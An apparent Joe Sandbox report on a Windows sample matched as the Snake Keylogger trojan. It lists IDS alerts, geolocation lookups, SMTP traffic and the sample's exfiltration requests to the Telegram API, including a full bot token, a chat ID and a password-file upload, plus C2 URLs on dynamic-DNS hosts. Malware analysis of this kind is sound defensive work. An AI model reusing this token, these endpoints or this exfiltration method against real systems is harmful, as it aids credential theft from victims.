Source: Network traffic	Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.6:49705 -> 149.154.167.220:443
Source: Network traffic	Suricata IDS: 1810007 - Severity 1 - Joe Security ANOMALY Telegram Send Message : 192.168.2.6:49703 -> 149.154.167.220:443

Uses the Telegram API (likely for C&C communication)

Source: unknown

DNS query: name: api.telegram.org

Source: global traffic

TCP traffic: 192.168.2.6:49704 -> 119.18.54.115:587

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:06:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: POST /bot7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk/sendDocument?chat_id=7319393351&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5efac3df2044Host: api.telegram.orgContent-Length: 576Connection: Keep-Alive

Source: Joe Sandbox View	IP Address: 149.154.167.220 149.154.167.220
Source: Joe Sandbox View	IP Address: 193.122.6.168 193.122.6.168

Source: Joe Sandbox View

ASN Name: PUBLIC-DOMAIN-REGISTRYUS PUBLIC-DOMAIN-REGISTRYUS

Source: Joe Sandbox View	JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: unknown	DNS query: name: checkip.dyndns.org
Source: unknown	DNS query: name: reallyfreegeoip.org

Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49686 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.6:49690 -> 193.122.6.168:80
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49689 -> 104.21.80.1:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:49700 -> 104.21.80.1:443

Source: global traffic

TCP traffic: 192.168.2.6:49704 -> 119.18.54.115:587

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 104.21.80.1:443 -> 192.168.2.6:49687 version: TLS 1.0

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.org
Source: global traffic	HTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20and%20Time:%2009/03/2025%20/%2000:06:37%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20061544%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1Host: api.telegram.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive

Source: global traffic	DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic	DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic	DNS traffic detected: DNS query: api.telegram.org
Source: global traffic	DNS traffic detected: DNS query: mail.ruchiraprinting.com

Source: unknown

HTTP traffic detected: POST /bot7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk/sendDocument?chat_id=7319393351&caption=%20Pc%20Name:%20user%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20user%20%7C%20VIP%20Recovery HTTP/1.1Content-Type: multipart/form-data; boundary=------------------------8dd5efac3df2044Host: api.telegram.orgContent-Length: 576Connection: Keep-Alive

Source: global traffic

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 22:20:55 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?L
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034BD000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.com
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/q
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033E8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.ruchiraprinting.com
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003491000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003498000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://reallyfreegeoip.org
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000032E1000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034BD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034BD000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000342E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034BD000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034B5000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:061544%0D%0ADate%20a
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000342E000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003435000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot7761905719:AAFoSgeBxg11MjKK1qWCOx87Kommp_rrKRk/sendDocument?chat_id=7319
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000345C000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000344D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000344D000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enP
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003457000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlB
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000332F000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000339F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000332F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000339F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000034A6000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003498000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033C7000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003359000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000339F000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000348D000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.00000000033E8000.00000004.00000800.00020000.00000000.sdmp, UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000347E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.000000000347E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/P
Source: UqdykLLTA2.exe, 00000003.00000002.3716120715.0000000003488000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lB

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 49698 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49700
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49687
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49698
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49696
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49696 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49691
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49702 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49691 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49700 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49687 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49702

Source: unknown

HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.6:49703 version: TLS 1.2

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UqdykLLTA2.exe.4dee318.4.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 3.2.UqdykLLTA2.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UqdykLLTA2.exe.4dee318.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UqdykLLTA2.exe.4d6faf8.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 0.2.UqdykLLTA2.exe.4e676c8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables with potential process hoocking Author: ditekSHen
Source: 00000003.00000002.3712524269.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1275846370.0000000004E67000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: 00000000.00000002.1275846370.0000000004AE2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
Source: Process Memory Space: UqdykLLTA2.exe PID: 5880, type: MEMORYSTR	Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown

Source: C:\Users\user\Desktop\UqdykLLTA2.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_018F4B01	0_2_018F4B01
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_018FDFC4	0_2_018FDFC4
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767BF78	0_2_0767BF78
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_07679E48	0_2_07679E48
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767A658	0_2_0767A658
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_07671A40	0_2_07671A40
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767B058	0_2_0767B058
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767CF70	0_2_0767CF70
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_07678F58	0_2_07678F58
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767BF25	0_2_0767BF25
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767CF80	0_2_0767CF80
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_07679E38	0_2_07679E38
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767E5E1	0_2_0767E5E1
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767E5F0	0_2_0767E5F0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767DDC2	0_2_0767DDC2
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767E360	0_2_0767E360
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767E352	0_2_0767E352
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_07671A30	0_2_07671A30
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767E1E0	0_2_0767E1E0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_0767E1F0	0_2_0767E1F0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A41E8	0_2_078A41E8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A3B08	0_2_078A3B08
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2870	0_2_078A2870
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A46B8	0_2_078A46B8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A46B2	0_2_078A46B2
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078AB500	0_2_078AB500
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A41D9	0_2_078A41D9
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078AD138	0_2_078AD138
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078AB0C8	0_2_078AB0C8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A0006	0_2_078A0006
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A0040	0_2_078A0040
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2FA1	0_2_078A2FA1
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2FB0	0_2_078A2FB0
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078ACD00	0_2_078ACD00
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2D49	0_2_078A2D49
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2D58	0_2_078A2D58
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2B08	0_2_078A2B08
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078ADAE8	0_2_078ADAE8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2AF8	0_2_078A2AF8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A3AF8	0_2_078A3AF8
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 0_2_078A2860	0_2_078A2860
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030E5370	3_2_030E5370
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030ED2CA	3_2_030ED2CA
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030E7118	3_2_030E7118
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EC147	3_2_030EC147
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EA088	3_2_030EA088
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EC738	3_2_030EC738
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Code function: 3_2_030EF650	3_2_030EF650
